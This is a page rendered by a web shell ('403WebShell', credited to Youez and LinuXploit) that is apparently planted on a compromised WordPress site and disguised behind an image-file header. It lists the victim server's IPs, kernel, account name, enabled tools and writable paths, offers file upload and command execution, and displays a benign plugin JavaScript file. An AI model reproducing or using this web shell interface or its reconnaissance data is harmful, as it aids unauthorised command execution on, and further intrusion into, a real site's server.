????JFIF??x?x????'403WebShell
403Webshell
Server IP : 104.21.64.1  /  Your IP : 216.73.216.145
Web Server : LiteSpeed
System : Linux premium151.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
User : tempvsty ( 647)
PHP Version : 8.0.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/tempvsty/oaa-foundation.org/wp-content/plugins/maintenance/js/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/tempvsty/oaa-foundation.org/wp-content/plugins/maintenance/js/uploads_.js
function uploads_multimedia_init (title, btnName, editing, multiple) {
		var outArray = [];
		var file_frame;
		if (file_frame) {		
			file_frame.open();
			return;
		}
		
		file_frame = wp.media.editor.send.attachment  = wp.media({
			 title: title,
		     button: {
						text: btnName
					 },
			 editing:    editing,
			 multiple:   multiple,
		});
		return file_frame;
}

jQuery(document).ready(function() {
   jQuery('.upload_btn').on('click', function( event ) {
			event.preventDefault();
			var vLinkElem = jQuery(this);
			var customData = vLinkElem.data('imagetype');
			var customClass = '';
			
			var file_frame = uploads_multimedia_init('Upload Image', 'Select Image', true, false);
			file_frame.on( 'select', function() {
				var selection = file_frame.state().get('selection');
					selection.map( function( attachment ) {
						attachment = attachment.toJSON();
						var image_url = attachment.url,
							image_id  = attachment.id;
							
							vLinkElem.parent().find('.boxes').css('background-image', 'url(' + image_url + ')');
							vLinkElem.parent().find('.boxes').append('<input class="button delete-img remove" type="submit" name="remove_bg" value="x" />');
							vLinkElem.parent().parent().find('input[type="hidden"]').val(image_id);
					});

			});

			file_frame.open();
			return false;
		});
	
		jQuery('.delete-img').on('click', function( event ) {
			event.preventDefault();
				var vLinkElem = jQuery(this);
					vLinkElem.parent().css('background-image', 'none'); 
					vLinkElem.parent().parent().parent().find('input[type="hidden"]').val('');
					vLinkElem.remove();
			return false;
		});	
	
}); 

Youez - 2016 - github.com/yon3zu
LinuXploit